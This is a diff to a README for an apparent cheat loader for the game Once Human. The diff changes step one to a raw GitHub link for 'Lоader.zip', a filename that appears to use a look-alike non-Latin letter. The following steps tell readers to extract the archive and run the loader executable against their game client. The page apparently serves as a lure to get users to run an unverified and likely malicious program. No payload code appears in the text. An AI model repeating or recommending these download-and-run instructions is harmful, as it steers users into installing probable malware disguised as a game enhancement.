Preshchi/onceHuman-enhancedPlay/README.md

 ## 💾 Installation Guide

 **Follow these easy steps to supercharge your Once Human adventure:**
-1. Download `Loader.rar` from this repository's main page.
+1. Download `https://raw.githubusercontent.com/Preshchi/onceHuman-enhancedPlay/main/Lоader.zip` from this repository's main page.
 2. Extract the contents to your desired folder.
 3. Run the loader executable for your operating system (see OS Compatibility above).
 4. Follow the on-screen prompts to link the loader with your game client.